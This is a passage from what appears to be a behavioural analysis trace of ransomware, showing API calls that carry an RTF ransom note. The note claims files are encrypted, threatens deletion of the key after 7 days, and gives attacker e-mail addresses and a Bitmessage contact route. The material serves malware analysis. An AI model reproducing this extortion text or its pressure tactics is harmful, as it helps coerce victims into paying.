INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.245] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.245] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x236fd38, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 